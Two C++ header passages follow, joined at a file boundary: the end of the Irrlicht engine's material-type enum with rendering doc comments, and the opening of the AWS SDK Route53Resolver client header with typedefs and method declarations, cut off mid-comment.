EMT_REFLECTION_2_LAYER, //! A transparent material. /** Only the first texture is used. The new color is calculated by simply adding the source color and the dest color. This means if for example a billboard using a texture with black background and a red circle on it is drawn with this material, the result is that only the red circle will be drawn a little bit transparent, and everything which was black is 100% transparent and not visible. This material type is useful for particle effects. */ EMT_TRANSPARENT_ADD_COLOR, //! Makes the material transparent based on the texture alpha channel. /** The final color is blended together from the destination color and the texture color, using the alpha channel value as blend factor. Only first texture is used. If you are using this material with small textures, it is a good idea to load the texture in 32 bit mode (video::IVideoDriver::setTextureCreationFlag()). Also, an alpha ref is used, which can be manipulated using SMaterial::MaterialTypeParam. This value controls how sharp the edges become when going from a transparent to a solid spot on the texture. */ EMT_TRANSPARENT_ALPHA_CHANNEL, //! Makes the material transparent based on the texture alpha channel. /** If the alpha channel value is greater than 127, a pixel is written to the target, otherwise not. This material does not use alpha blending and is a lot faster than EMT_TRANSPARENT_ALPHA_CHANNEL. It is ideal for drawing stuff like leafes of plants, because the borders are not blurry but sharp. Only first texture is used. If you are using this material with small textures and 3d object, it is a good idea to load the texture in 32 bit mode (video::IVideoDriver::setTextureCreationFlag()). */ EMT_TRANSPARENT_ALPHA_CHANNEL_REF, //! Makes the material transparent based on the vertex alpha value. EMT_TRANSPARENT_VERTEX_ALPHA, //! A transparent reflecting material with an optional additional non reflecting texture layer. /** The reflection map should be set as first texture. The transparency depends on the alpha value in the vertex colors. A texture which will not reflect can be set as second texture. Please note that this material type is currently not 100% implemented in OpenGL. */ EMT_TRANSPARENT_REFLECTION_2_LAYER, //! A solid normal map renderer. /** First texture is the color map, the second should be the normal map. Note that you should use this material only when drawing geometry consisting of vertices of type S3DVertexTangents (EVT_TANGENTS). You can convert any mesh into this format using IMeshManipulator::createMeshWithTangents() (See SpecialFX2 Tutorial). This shader runs on vertex shader 1.1 and pixel shader 1.1 capable hardware and falls back to a fixed function lighted material if this hardware is not available. Only two lights are supported by this shader, if there are more, the nearest two are chosen. */ EMT_NORMAL_MAP_SOLID, //! A transparent normal map renderer. /** First texture is the color map, the second should be the normal map. Note that you should use this material only when drawing geometry consisting of vertices of type S3DVertexTangents (EVT_TANGENTS). You can convert any mesh into this format using IMeshManipulator::createMeshWithTangents() (See SpecialFX2 Tutorial). This shader runs on vertex shader 1.1 and pixel shader 1.1 capable hardware and falls back to a fixed function lighted material if this hardware is not available. Only two lights are supported by this shader, if there are more, the nearest two are chosen. */ EMT_NORMAL_MAP_TRANSPARENT_ADD_COLOR, //! A transparent (based on the vertex alpha value) normal map renderer. /** First texture is the color map, the second should be the normal map. Note that you should use this material only when drawing geometry consisting of vertices of type S3DVertexTangents (EVT_TANGENTS). You can convert any mesh into this format using IMeshManipulator::createMeshWithTangents() (See SpecialFX2 Tutorial). This shader runs on vertex shader 1.1 and pixel shader 1.1 capable hardware and falls back to a fixed function lighted material if this hardware is not available. Only two lights are supported by this shader, if there are more, the nearest two are chosen. */ EMT_NORMAL_MAP_TRANSPARENT_VERTEX_ALPHA, //! Just like EMT_NORMAL_MAP_SOLID, but uses parallax mapping. /** Looks a lot more realistic. This only works when the hardware supports at least vertex shader 1.1 and pixel shader 1.4. First texture is the color map, the second should be the normal map. The normal map texture should contain the height value in the alpha component. The IVideoDriver::makeNormalMapTexture() method writes this value automatically when creating normal maps from a heightmap when using a 32 bit texture. The height scale of the material (affecting the bumpiness) is being controlled by the SMaterial::MaterialTypeParam member. If set to zero, the default value (0.02f) will be applied. Otherwise the value set in SMaterial::MaterialTypeParam is taken. This value depends on with which scale the texture is mapped on the material. Too high or low values of MaterialTypeParam can result in strange artifacts. */ EMT_PARALLAX_MAP_SOLID, //! A material like EMT_PARALLAX_MAP_SOLID, but transparent. /** Using EMT_TRANSPARENT_ADD_COLOR as base material. */ EMT_PARALLAX_MAP_TRANSPARENT_ADD_COLOR, //! A material like EMT_PARALLAX_MAP_SOLID, but transparent. /** Using EMT_TRANSPARENT_VERTEX_ALPHA as base material. */ EMT_PARALLAX_MAP_TRANSPARENT_VERTEX_ALPHA, //! BlendFunc = source * sourceFactor + dest * destFactor ( E_BLEND_FUNC ) /** Using only first texture. Generic blending method. */ EMT_ONETEXTURE_BLEND, //! This value is not used. It only forces this enumeration to compile to 32 bit. EMT_FORCE_32BIT = 0x7fffffff }; //! Array holding the built in material type names const char* const sBuiltInMaterialTypeNames[] = { "solid", "solid_2layer", "lightmap", "lightmap_add", "lightmap_m2", "lightmap_m4", "lightmap_light", "lightmap_light_m2", "lightmap_light_m4", "detail_map", "sphere_map", "reflection_2layer", "trans_add", "trans_alphach", "trans_alphach_ref", "trans_vertex_alpha", "trans_reflection_2layer", "normalmap_solid", "normalmap_trans_add", "normalmap_trans_vertexalpha", "parallaxmap_solid", "parallaxmap_trans_add", "parallaxmap_trans_vertexalpha", "onetexture_blend", 0 }; } // end namespace video } // end namespace irr #endif // __E_MATERIAL_TYPES_H_INCLUDED__
/** * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * SPDX-License-Identifier: Apache-2.0. */ #pragma once #include <aws/route53resolver/Route53Resolver_EXPORTS.h> #include <aws/route53resolver/Route53ResolverErrors.h> #include <aws/core/client/AWSError.h> #include <aws/core/client/ClientConfiguration.h> #include <aws/core/client/AWSClient.h> #include <aws/core/utils/memory/stl/AWSString.h> #include <aws/core/utils/json/JsonSerializer.h> #include <aws/route53resolver/model/AssociateResolverEndpointIpAddressResult.h> #include <aws/route53resolver/model/AssociateResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/AssociateResolverRuleResult.h> #include <aws/route53resolver/model/CreateResolverEndpointResult.h> #include <aws/route53resolver/model/CreateResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/CreateResolverRuleResult.h> #include <aws/route53resolver/model/DeleteResolverEndpointResult.h> #include <aws/route53resolver/model/DeleteResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/DeleteResolverRuleResult.h> #include <aws/route53resolver/model/DisassociateResolverEndpointIpAddressResult.h> #include <aws/route53resolver/model/DisassociateResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/DisassociateResolverRuleResult.h> #include <aws/route53resolver/model/GetResolverDnssecConfigResult.h> #include <aws/route53resolver/model/GetResolverEndpointResult.h> #include <aws/route53resolver/model/GetResolverQueryLogConfigResult.h> #include <aws/route53resolver/model/GetResolverQueryLogConfigAssociationResult.h> #include <aws/route53resolver/model/GetResolverQueryLogConfigPolicyResult.h> #include <aws/route53resolver/model/GetResolverRuleResult.h> #include <aws/route53resolver/model/GetResolverRuleAssociationResult.h> #include <aws/route53resolver/model/GetResolverRulePolicyResult.h> #include <aws/route53resolver/model/ListResolverDnssecConfigsResult.h> #include <aws/route53resolver/model/ListResolverEndpointIpAddressesResult.h> #include <aws/route53resolver/model/ListResolverEndpointsResult.h> #include <aws/route53resolver/model/ListResolverQueryLogConfigAssociationsResult.h> #include <aws/route53resolver/model/ListResolverQueryLogConfigsResult.h> #include <aws/route53resolver/model/ListResolverRuleAssociationsResult.h> #include <aws/route53resolver/model/ListResolverRulesResult.h> #include <aws/route53resolver/model/ListTagsForResourceResult.h> #include <aws/route53resolver/model/PutResolverQueryLogConfigPolicyResult.h> #include <aws/route53resolver/model/PutResolverRulePolicyResult.h> #include <aws/route53resolver/model/TagResourceResult.h> #include <aws/route53resolver/model/UntagResourceResult.h> #include <aws/route53resolver/model/UpdateResolverDnssecConfigResult.h> #include <aws/route53resolver/model/UpdateResolverEndpointResult.h> #include <aws/route53resolver/model/UpdateResolverRuleResult.h> #include <aws/core/client/AsyncCallerContext.h> #include <aws/core/http/HttpTypes.h> #include <future> #include <functional> namespace Aws { namespace Http { class HttpClient; class HttpClientFactory; } // namespace Http namespace Utils { template< typename R, typename E> class Outcome; namespace Threading { class Executor; } // namespace Threading } // namespace Utils namespace Auth { class AWSCredentials; class AWSCredentialsProvider; } // namespace Auth namespace Client { class RetryStrategy; } // namespace Client namespace Route53Resolver { namespace Model { class AssociateResolverEndpointIpAddressRequest; class AssociateResolverQueryLogConfigRequest; class AssociateResolverRuleRequest; class CreateResolverEndpointRequest; class CreateResolverQueryLogConfigRequest; class CreateResolverRuleRequest; class DeleteResolverEndpointRequest; class DeleteResolverQueryLogConfigRequest; class DeleteResolverRuleRequest; class DisassociateResolverEndpointIpAddressRequest; class DisassociateResolverQueryLogConfigRequest; class DisassociateResolverRuleRequest; class GetResolverDnssecConfigRequest; class GetResolverEndpointRequest; class GetResolverQueryLogConfigRequest; class GetResolverQueryLogConfigAssociationRequest; class GetResolverQueryLogConfigPolicyRequest; class GetResolverRuleRequest; class GetResolverRuleAssociationRequest; class GetResolverRulePolicyRequest; class ListResolverDnssecConfigsRequest; class ListResolverEndpointIpAddressesRequest; class ListResolverEndpointsRequest; class ListResolverQueryLogConfigAssociationsRequest; class ListResolverQueryLogConfigsRequest; class ListResolverRuleAssociationsRequest; class ListResolverRulesRequest; class ListTagsForResourceRequest; class PutResolverQueryLogConfigPolicyRequest; class PutResolverRulePolicyRequest; class TagResourceRequest; class UntagResourceRequest; class UpdateResolverDnssecConfigRequest; class UpdateResolverEndpointRequest; class UpdateResolverRuleRequest; typedef Aws::Utils::Outcome<AssociateResolverEndpointIpAddressResult, Route53ResolverError> AssociateResolverEndpointIpAddressOutcome; typedef Aws::Utils::Outcome<AssociateResolverQueryLogConfigResult, Route53ResolverError> AssociateResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<AssociateResolverRuleResult, Route53ResolverError> AssociateResolverRuleOutcome; typedef Aws::Utils::Outcome<CreateResolverEndpointResult, Route53ResolverError> CreateResolverEndpointOutcome; typedef Aws::Utils::Outcome<CreateResolverQueryLogConfigResult, Route53ResolverError> CreateResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<CreateResolverRuleResult, Route53ResolverError> CreateResolverRuleOutcome; typedef Aws::Utils::Outcome<DeleteResolverEndpointResult, Route53ResolverError> DeleteResolverEndpointOutcome; typedef Aws::Utils::Outcome<DeleteResolverQueryLogConfigResult, Route53ResolverError> DeleteResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<DeleteResolverRuleResult, Route53ResolverError> DeleteResolverRuleOutcome; typedef Aws::Utils::Outcome<DisassociateResolverEndpointIpAddressResult, Route53ResolverError> DisassociateResolverEndpointIpAddressOutcome; typedef Aws::Utils::Outcome<DisassociateResolverQueryLogConfigResult, Route53ResolverError> DisassociateResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<DisassociateResolverRuleResult, Route53ResolverError> DisassociateResolverRuleOutcome; typedef Aws::Utils::Outcome<GetResolverDnssecConfigResult, Route53ResolverError> GetResolverDnssecConfigOutcome; typedef Aws::Utils::Outcome<GetResolverEndpointResult, Route53ResolverError> GetResolverEndpointOutcome; typedef Aws::Utils::Outcome<GetResolverQueryLogConfigResult, Route53ResolverError> GetResolverQueryLogConfigOutcome; typedef Aws::Utils::Outcome<GetResolverQueryLogConfigAssociationResult, Route53ResolverError> GetResolverQueryLogConfigAssociationOutcome; typedef Aws::Utils::Outcome<GetResolverQueryLogConfigPolicyResult, Route53ResolverError> GetResolverQueryLogConfigPolicyOutcome; typedef Aws::Utils::Outcome<GetResolverRuleResult, Route53ResolverError> GetResolverRuleOutcome; typedef Aws::Utils::Outcome<GetResolverRuleAssociationResult, Route53ResolverError> GetResolverRuleAssociationOutcome; typedef Aws::Utils::Outcome<GetResolverRulePolicyResult, Route53ResolverError> GetResolverRulePolicyOutcome; typedef Aws::Utils::Outcome<ListResolverDnssecConfigsResult, Route53ResolverError> ListResolverDnssecConfigsOutcome; typedef Aws::Utils::Outcome<ListResolverEndpointIpAddressesResult, Route53ResolverError> ListResolverEndpointIpAddressesOutcome; typedef Aws::Utils::Outcome<ListResolverEndpointsResult, Route53ResolverError> ListResolverEndpointsOutcome; typedef Aws::Utils::Outcome<ListResolverQueryLogConfigAssociationsResult, Route53ResolverError> ListResolverQueryLogConfigAssociationsOutcome; typedef Aws::Utils::Outcome<ListResolverQueryLogConfigsResult, Route53ResolverError> ListResolverQueryLogConfigsOutcome; typedef Aws::Utils::Outcome<ListResolverRuleAssociationsResult, Route53ResolverError> ListResolverRuleAssociationsOutcome; typedef Aws::Utils::Outcome<ListResolverRulesResult, Route53ResolverError> ListResolverRulesOutcome; typedef Aws::Utils::Outcome<ListTagsForResourceResult, Route53ResolverError> ListTagsForResourceOutcome; typedef Aws::Utils::Outcome<PutResolverQueryLogConfigPolicyResult, Route53ResolverError> PutResolverQueryLogConfigPolicyOutcome; typedef Aws::Utils::Outcome<PutResolverRulePolicyResult, Route53ResolverError> PutResolverRulePolicyOutcome; typedef Aws::Utils::Outcome<TagResourceResult, Route53ResolverError> TagResourceOutcome; typedef Aws::Utils::Outcome<UntagResourceResult, Route53ResolverError> UntagResourceOutcome; typedef Aws::Utils::Outcome<UpdateResolverDnssecConfigResult, Route53ResolverError> UpdateResolverDnssecConfigOutcome; typedef Aws::Utils::Outcome<UpdateResolverEndpointResult, Route53ResolverError> UpdateResolverEndpointOutcome; typedef Aws::Utils::Outcome<UpdateResolverRuleResult, Route53ResolverError> UpdateResolverRuleOutcome; typedef std::future<AssociateResolverEndpointIpAddressOutcome> AssociateResolverEndpointIpAddressOutcomeCallable; typedef std::future<AssociateResolverQueryLogConfigOutcome> AssociateResolverQueryLogConfigOutcomeCallable; typedef std::future<AssociateResolverRuleOutcome> AssociateResolverRuleOutcomeCallable; typedef std::future<CreateResolverEndpointOutcome> CreateResolverEndpointOutcomeCallable; typedef std::future<CreateResolverQueryLogConfigOutcome> CreateResolverQueryLogConfigOutcomeCallable; typedef std::future<CreateResolverRuleOutcome> CreateResolverRuleOutcomeCallable; typedef std::future<DeleteResolverEndpointOutcome> DeleteResolverEndpointOutcomeCallable; typedef std::future<DeleteResolverQueryLogConfigOutcome> DeleteResolverQueryLogConfigOutcomeCallable; typedef std::future<DeleteResolverRuleOutcome> DeleteResolverRuleOutcomeCallable; typedef std::future<DisassociateResolverEndpointIpAddressOutcome> DisassociateResolverEndpointIpAddressOutcomeCallable; typedef std::future<DisassociateResolverQueryLogConfigOutcome> DisassociateResolverQueryLogConfigOutcomeCallable; typedef std::future<DisassociateResolverRuleOutcome> DisassociateResolverRuleOutcomeCallable; typedef std::future<GetResolverDnssecConfigOutcome> GetResolverDnssecConfigOutcomeCallable; typedef std::future<GetResolverEndpointOutcome> GetResolverEndpointOutcomeCallable; typedef std::future<GetResolverQueryLogConfigOutcome> GetResolverQueryLogConfigOutcomeCallable; typedef std::future<GetResolverQueryLogConfigAssociationOutcome> GetResolverQueryLogConfigAssociationOutcomeCallable; typedef std::future<GetResolverQueryLogConfigPolicyOutcome> GetResolverQueryLogConfigPolicyOutcomeCallable; typedef std::future<GetResolverRuleOutcome> GetResolverRuleOutcomeCallable; typedef std::future<GetResolverRuleAssociationOutcome> GetResolverRuleAssociationOutcomeCallable; typedef std::future<GetResolverRulePolicyOutcome> GetResolverRulePolicyOutcomeCallable; typedef std::future<ListResolverDnssecConfigsOutcome> ListResolverDnssecConfigsOutcomeCallable; typedef std::future<ListResolverEndpointIpAddressesOutcome> ListResolverEndpointIpAddressesOutcomeCallable; typedef std::future<ListResolverEndpointsOutcome> ListResolverEndpointsOutcomeCallable; typedef std::future<ListResolverQueryLogConfigAssociationsOutcome> ListResolverQueryLogConfigAssociationsOutcomeCallable; typedef std::future<ListResolverQueryLogConfigsOutcome> ListResolverQueryLogConfigsOutcomeCallable; typedef std::future<ListResolverRuleAssociationsOutcome> ListResolverRuleAssociationsOutcomeCallable; typedef std::future<ListResolverRulesOutcome> ListResolverRulesOutcomeCallable; typedef std::future<ListTagsForResourceOutcome> ListTagsForResourceOutcomeCallable; typedef std::future<PutResolverQueryLogConfigPolicyOutcome> PutResolverQueryLogConfigPolicyOutcomeCallable; typedef std::future<PutResolverRulePolicyOutcome> PutResolverRulePolicyOutcomeCallable; typedef std::future<TagResourceOutcome> TagResourceOutcomeCallable; typedef std::future<UntagResourceOutcome> UntagResourceOutcomeCallable; typedef std::future<UpdateResolverDnssecConfigOutcome> UpdateResolverDnssecConfigOutcomeCallable; typedef std::future<UpdateResolverEndpointOutcome> UpdateResolverEndpointOutcomeCallable; typedef std::future<UpdateResolverRuleOutcome> UpdateResolverRuleOutcomeCallable; } // namespace Model class Route53ResolverClient; typedef std::function<void(const Route53ResolverClient*, const Model::AssociateResolverEndpointIpAddressRequest&, const Model::AssociateResolverEndpointIpAddressOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > AssociateResolverEndpointIpAddressResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::AssociateResolverQueryLogConfigRequest&, const Model::AssociateResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > AssociateResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::AssociateResolverRuleRequest&, const Model::AssociateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > AssociateResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::CreateResolverEndpointRequest&, const Model::CreateResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > CreateResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::CreateResolverQueryLogConfigRequest&, const Model::CreateResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > CreateResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::CreateResolverRuleRequest&, const Model::CreateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > CreateResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DeleteResolverEndpointRequest&, const Model::DeleteResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DeleteResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DeleteResolverQueryLogConfigRequest&, const Model::DeleteResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DeleteResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DeleteResolverRuleRequest&, const Model::DeleteResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DeleteResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DisassociateResolverEndpointIpAddressRequest&, const Model::DisassociateResolverEndpointIpAddressOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DisassociateResolverEndpointIpAddressResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DisassociateResolverQueryLogConfigRequest&, const Model::DisassociateResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DisassociateResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::DisassociateResolverRuleRequest&, const Model::DisassociateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > DisassociateResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverDnssecConfigRequest&, const Model::GetResolverDnssecConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverDnssecConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverEndpointRequest&, const Model::GetResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverQueryLogConfigRequest&, const Model::GetResolverQueryLogConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverQueryLogConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverQueryLogConfigAssociationRequest&, const Model::GetResolverQueryLogConfigAssociationOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverQueryLogConfigAssociationResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverQueryLogConfigPolicyRequest&, const Model::GetResolverQueryLogConfigPolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverQueryLogConfigPolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverRuleRequest&, const Model::GetResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverRuleResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverRuleAssociationRequest&, const Model::GetResolverRuleAssociationOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverRuleAssociationResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::GetResolverRulePolicyRequest&, const Model::GetResolverRulePolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > GetResolverRulePolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverDnssecConfigsRequest&, const Model::ListResolverDnssecConfigsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverDnssecConfigsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverEndpointIpAddressesRequest&, const Model::ListResolverEndpointIpAddressesOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverEndpointIpAddressesResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverEndpointsRequest&, const Model::ListResolverEndpointsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverEndpointsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverQueryLogConfigAssociationsRequest&, const Model::ListResolverQueryLogConfigAssociationsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverQueryLogConfigAssociationsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverQueryLogConfigsRequest&, const Model::ListResolverQueryLogConfigsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverQueryLogConfigsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverRuleAssociationsRequest&, const Model::ListResolverRuleAssociationsOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverRuleAssociationsResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListResolverRulesRequest&, const Model::ListResolverRulesOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListResolverRulesResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::ListTagsForResourceRequest&, const Model::ListTagsForResourceOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > ListTagsForResourceResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::PutResolverQueryLogConfigPolicyRequest&, const Model::PutResolverQueryLogConfigPolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > PutResolverQueryLogConfigPolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::PutResolverRulePolicyRequest&, const Model::PutResolverRulePolicyOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > PutResolverRulePolicyResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::TagResourceRequest&, const Model::TagResourceOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > TagResourceResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UntagResourceRequest&, const Model::UntagResourceOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UntagResourceResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UpdateResolverDnssecConfigRequest&, const Model::UpdateResolverDnssecConfigOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UpdateResolverDnssecConfigResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UpdateResolverEndpointRequest&, const Model::UpdateResolverEndpointOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UpdateResolverEndpointResponseReceivedHandler; typedef std::function<void(const Route53ResolverClient*, const Model::UpdateResolverRuleRequest&, const Model::UpdateResolverRuleOutcome&, const std::shared_ptr<const Aws::Client::AsyncCallerContext>&) > UpdateResolverRuleResponseReceivedHandler; /** * <p>When you create a VPC using Amazon VPC, you automatically get DNS resolution * within the VPC from Route 53 Resolver. By default, Resolver answers DNS queries * for VPC domain names such as domain names for EC2 instances or ELB load * balancers. Resolver performs recursive lookups against public name servers for * all other domain names.</p> <p>You can also configure DNS resolution between * your VPC and your network over a Direct Connect or VPN connection:</p> <p> * <b>Forward DNS queries from resolvers on your network to Route 53 Resolver</b> * </p> <p>DNS resolvers on your network can forward DNS queries to Resolver in a * specified VPC. This allows your DNS resolvers to easily resolve domain names for * AWS resources such as EC2 instances or records in a Route 53 private hosted * zone. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver.html#resolver-overview-forward-network-to-vpc">How * DNS Resolvers on Your Network Forward DNS Queries to Route 53 Resolver</a> in * the <i>Amazon Route 53 Developer Guide</i>.</p> <p> <b>Conditionally forward * queries from a VPC to resolvers on your network</b> </p> <p>You can configure * Resolver to forward queries that it receives from EC2 instances in your VPCs to * DNS resolvers on your network. To forward selected queries, you create Resolver * rules that specify the domain names for the DNS queries that you want to forward * (such as example.com), and the IP addresses of the DNS resolvers on your network * that you want to forward the queries to. If a query matches multiple rules * (example.com, acme.example.com), Resolver chooses the rule with the most * specific match (acme.example.com) and forwards the query to the IP addresses * that you specified in that rule. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver.html#resolver-overview-forward-vpc-to-network">How * Route 53 Resolver Forwards DNS Queries from Your VPCs to Your Network</a> in the * <i>Amazon Route 53 Developer Guide</i>.</p> <p>Like Amazon VPC, Resolver is * regional. In each region where you have VPCs, you can choose whether to forward * queries from your VPCs to your network (outbound queries), from your network to * your VPCs (inbound queries), or both.</p> */ class AWS_ROUTE53RESOLVER_API Route53ResolverClient : public Aws::Client::AWSJsonClient { public: typedef Aws::Client::AWSJsonClient BASECLASS; /** * Initializes client to use DefaultCredentialProviderChain, with default http client factory, and optional client config. If client config * is not specified, it will be initialized to default values. */ Route53ResolverClient(const Aws::Client::ClientConfiguration& clientConfiguration = Aws::Client::ClientConfiguration()); /** * Initializes client to use SimpleAWSCredentialsProvider, with default http client factory, and optional client config. If client config * is not specified, it will be initialized to default values. */ Route53ResolverClient(const Aws::Auth::AWSCredentials& credentials, const Aws::Client::ClientConfiguration& clientConfiguration = Aws::Client::ClientConfiguration()); /** * Initializes client to use specified credentials provider with specified client config. If http client factory is not supplied, * the default http client factory will be used */ Route53ResolverClient(const std::shared_ptr<Aws::Auth::AWSCredentialsProvider>& credentialsProvider, const Aws::Client::ClientConfiguration& clientConfiguration = Aws::Client::ClientConfiguration()); virtual ~Route53ResolverClient(); /** * <p>Adds IP addresses to an inbound or an outbound Resolver endpoint. If you want * to add more than one IP address, submit one * <code>AssociateResolverEndpointIpAddress</code> request for each IP address.</p> * <p>To remove an IP address from an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverEndpointIpAddress.html">DisassociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverEndpointIpAddress">AWS * API Reference</a></p> */ virtual Model::AssociateResolverEndpointIpAddressOutcome AssociateResolverEndpointIpAddress(const Model::AssociateResolverEndpointIpAddressRequest& request) const; /** * <p>Adds IP addresses to an inbound or an outbound Resolver endpoint. If you want * to add more than one IP address, submit one * <code>AssociateResolverEndpointIpAddress</code> request for each IP address.</p> * <p>To remove an IP address from an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverEndpointIpAddress.html">DisassociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::AssociateResolverEndpointIpAddressOutcomeCallable AssociateResolverEndpointIpAddressCallable(const Model::AssociateResolverEndpointIpAddressRequest& request) const; /** * <p>Adds IP addresses to an inbound or an outbound Resolver endpoint. If you want * to add more than one IP address, submit one * <code>AssociateResolverEndpointIpAddress</code> request for each IP address.</p> * <p>To remove an IP address from an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverEndpointIpAddress.html">DisassociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void AssociateResolverEndpointIpAddressAsync(const Model::AssociateResolverEndpointIpAddressRequest& request, const AssociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Associates an Amazon VPC with a specified query logging configuration. Route * 53 Resolver logs DNS queries that originate in all of the Amazon VPCs that are * associated with a specified query logging configuration. To associate more than * one VPC with a configuration, submit one * <code>AssociateResolverQueryLogConfig</code> request for each VPC.</p> * <p>The VPCs that you associate with a query logging configuration must be in the * same Region as the configuration.</p> 